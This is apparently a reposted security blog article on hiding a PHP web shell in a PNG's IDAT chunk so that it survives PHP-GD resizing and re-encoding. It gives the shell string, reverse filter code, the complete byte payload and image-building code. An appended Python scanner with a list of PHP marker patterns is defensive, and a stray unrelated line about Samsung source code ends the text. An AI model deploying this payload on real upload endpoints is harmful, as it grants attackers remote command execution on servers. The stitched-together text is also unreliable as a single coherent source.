      Within the PNG file format (we'll focus on true-color PNG files rather than indexed) the IDAT chunk stores the pixel information. It's in this chunk that we'll store the PHP shell. For now we'll assume that pixels are always stored as 3 bytes representing the RGB color channels. When a raw image is saved as a PNG each row of the image is filtered on a per byte basis and the row is prefixed with a number depicting the type of filter that's been used (0x01 to 0x05); different rows can use different filters. The rationale behind this is to improve the compression ratio. Once all the rows have been filtered they are all compressed with the DEFLATE algorithm to form the IDAT chunk. So if we want to input data as a raw image and have it saved as a shell we need to defeat both the PNG line filters and the DEFLATE algorithm. It's easier to work backwards so we'll start with DEFLATE.

      Step 1. Compressing a string to form a shell
      Ideally we need to design a string that compresses to form a shell. This is not as hard as you might think, but obviously our string can't contain any repeated blocks of code (or they'll be compressed). In fact, to prevent a shell from being compressed you have to design one that doesn't have any repeated substrings longer than 2 characters in length. This means we have to keep it short:
        <?=`$_GET[0]`;?>
      If only it were that simple. Sadly, if you run DEFLATE over the above string you get a load of garbage out; the string hasn't been compressed, but the DEFLATE results don't start on a byte boundary and are encoded using LSB rather than MSB. I won't go into it in too much detail but you can read more on Pograph's weblog. It turns out the easiest shell to encode is in upper case:
        <?=$_GET[0]($_POST[1]);?>
      You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute. I've engineered the following string that DEFLATES to the above; the advantage of this string is that the first byte of the payload can be changed from 0x00 up to 0x04 and the compressed string will still remain readable – this is important for evading the PNG filters that will be encountered in the next phase of processing.
        03a39f67546f2c24152b116712546f112e29152b2167226b6f5f5310
      Sadly you can't just embed this in the initial raw image and have it spat out in the IDAT chunk as the PNG library filters the image rows first before it applies DEFLATE.

      Step 2. Bypassing the PNG line filters
      There are 5 different types of filters and the PNG encoder decides which one it wants to use for each line. The problem now is we need to construct a string that when passed to the filters results in the string in step 1 being generated. As long as our image only contains the 1 row payload (the rest of the image needs to be a constant color, e.g. black) then the two filters you are likely to encounter are 1 and 3. To simplify things further, if the payload remains in the top left of the image then we can write the reverse of the two filters as follows:
        // $p holds the payload bytes, $s the number of bytes to process;
        // each byte is adjusted by the byte 3 positions back (same channel, previous pixel)
        // Reverse Filter 1
        for ($i = 0; $i < $s; $i++) {
            $p[$i+3] = ($p[$i+3] + $p[$i]) % 256;
        }
        // Reverse Filter 3
        for ($i = 0; $i < $s; $i++) {
            $p[$i+3] = ($p[$i+3] + floor($p[$i] / 2)) % 256;
        }
      If you encode the payload using just filter 3 the PNG encoder will try to encode it using filter 1; if you encode it using filter 1 the PNG encoder tries to use filter 0 – eventually you end up stuck in a loop. To control which filter the PNG encoder selects I encode the shell in step two with both the inverse of filter 3 and filter 1 and concatenate them; this forces the encoder to choose filter 3 for the payload and ensures that when the data in the raw image is encoded it is transformed into the code in step 2. This code then compresses into the web shell which is stored in the IDAT chunk. Using this method the following payload is created – filter 3 is in green, filter 1 in grey. Ironically, using filters actually makes the payload larger.
        0xa3, 0x9f, 0x67, 0xf7, 0xe, 0x93, 0x1b, 0x23, 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae, 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc, 0x5a, 0x1, 0xdc, 0x5a, 0x1, 0xdc, 0xa3, 0x9f, 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c, 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d, 0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1, 0x66, 0x44, 0x50, 0x33

      Step 3. Constructing the Raw Image
      When constructing the raw image that GD will encode into a PNG file it's important that you place the payload in the first row of the image. It's worth noting at this point that the payload I've provided above only works for small images (up to ~40px by ~40px) although it is possible to construct payloads for larger image sizes. Payloads need to be encoded as RGB byte sequences like so:
        $p = array(0xa3, 0x9f, 0x67, 0xf7, 0xe, 0x93, 0x1b, 0x23, 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae, 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc, 0x5a, 0x1, 0xdc, 0x5a, 0x1, 0xdc, 0xa3, 0x9f, 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c, 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d, 0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1, 0x66, 0x44, 0x50, 0x33);
        $img = imagecreatetruecolor(32, 32);
        // walk the payload three bytes at a time and write each RGB triple as one pixel of the first row
        for ($y = 0; $y < sizeof($p); $y += 3) {
            $r = $p[$y];
            $g = $p[$y+1];
            $b = $p[$y+2];
            $color = imagecolorallocate($img, $r, $g, $b);
            imagesetpixel($img, round($y / 3), 0, $color);
        }
        imagepng($img);
      When the image is constructed it should appear as a string of pixels in the top left corner on a black background. When the image is viewed with a hex editor you should be able to see the shell. If you want a background that's not black it is possible; you may get away with filling in the background with data as long as the bytes (not pixels) within this data do not appear within the rest of the image. If they do, the payload may be destroyed when the IDAT block is compressed – it may also cause other filters to be deployed by the encoder.

      Step 4. Bypassing image transforms
      The primary reason for putting a web shell in the IDAT chunk is that it has the ability to bypass resize and re-sampling operations – PHP-GD contains two functions to do this, imagecopyresized and imagecopyresampled. Imagecopyresampled transforms images by taking the average pixel value over a group of pixels, meaning that to bypass this you need to encode the payload in a series of rectangles or squares. Imagecopyresized however transforms images by sampling every few pixels, meaning that to bypass this function you actually only have to change a few pixels. Both images below contain the web shell when resized to ¹/?th of their original size.

      Some conclusions
      Placing shells in IDAT chunks has some big advantages and should bypass most data validation techniques where applications resize or re-encode uploaded images. You can even upload the above payloads as GIFs or JPEGs etc. as long as the final image is saved as a PNG. There are probably some better techniques you could use to hide the shell more convincingly and, short of scanning each uploaded image for a shell, there is probably not much you can do as a developer to stop it. I'd imagine that encoding a shell into a lossy format such as JPEG could be substantially harder – but probably not impossible.
      Source: Encoding Web Shells in PNG IDAT chunks | Web App Security
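The post ends with the observation that scanning each uploaded image is the one thing a developer can do. As an added example (not from the original post), here is such a scanner in Python: it walks the PNG chunks, verifies CRCs, and looks for PHP markers in the compressed IDAT bytes (where the post's payload ends up and is visible in a hex editor), in the inflated filter-prefixed scanlines, and in ancillary chunks such as tEXt. make_png builds a constructed 8-bit RGB test image with filter type 0 so the scanner can be exercised offline; the marker list is constructed for this example.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Byte patterns that have no business inside pixel data; constructed list for this example.
SHELL_MARKERS = (b"<?php", b"<?=", b"$_GET[", b"$_POST[", b"shell_exec(")


def iter_chunks(data: bytes):
    """Yield (type, payload) for each chunk after checking the signature and CRCs."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack("!I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(payload) != length or len(crc_bytes) != 4:
            raise ValueError("truncated chunk %r" % ctype)
        if zlib.crc32(ctype + payload) != struct.unpack("!I", crc_bytes)[0]:
            raise ValueError("bad CRC in chunk %r" % ctype)
        yield ctype, payload
        pos += 12 + length
        if ctype == b"IEND":
            break


def scan_png(data: bytes) -> dict:
    """Report markers found in the compressed IDAT stream, in the inflated
    filter-prefixed scanlines, and in chunks other than IHDR/IDAT/IEND."""
    hits = {"idat_compressed": [], "idat_inflated": [], "other_chunks": []}
    idat = b""
    for ctype, payload in iter_chunks(data):
        if ctype == b"IDAT":
            idat += payload
        elif ctype not in (b"IHDR", b"IEND"):
            hits["other_chunks"] += [m for m in SHELL_MARKERS if m in payload]
    hits["idat_compressed"] = [m for m in SHELL_MARKERS if m in idat]
    try:
        raw = zlib.decompress(idat)
    except zlib.error:
        hits["idat_inflated"] = [b"<IDAT does not inflate>"]
    else:
        hits["idat_inflated"] = [m for m in SHELL_MARKERS if m in raw]
    return hits


def is_suspicious(data: bytes) -> bool:
    """A hit anywhere is reason to reject or re-encode the upload, not proof of a shell."""
    return any(scan_png(data).values())


def _chunk(ctype: bytes, payload: bytes) -> bytes:
    return (struct.pack("!I", len(payload)) + ctype + payload
            + struct.pack("!I", zlib.crc32(ctype + payload)))


def make_png(width: int, height: int, first_row: bytes) -> bytes:
    """Constructed 8-bit RGB test image: filter type 0 on every row, the first row
    taken from the caller (padded or cut to width*3 bytes), the rest black."""
    row_len = width * 3
    rows = [b"\x00" + first_row.ljust(row_len, b"\x00")[:row_len]]
    rows += [b"\x00" + b"\x00" * row_len] * (height - 1)
    ihdr = struct.pack("!IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(b"".join(rows))) + _chunk(b"IEND", b""))
```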
  24. The source code for the new Galaxy S3 model published by Samsung: http://opensource.samsung.com/reception/receptionSub.do?method=search&searchValue=I9300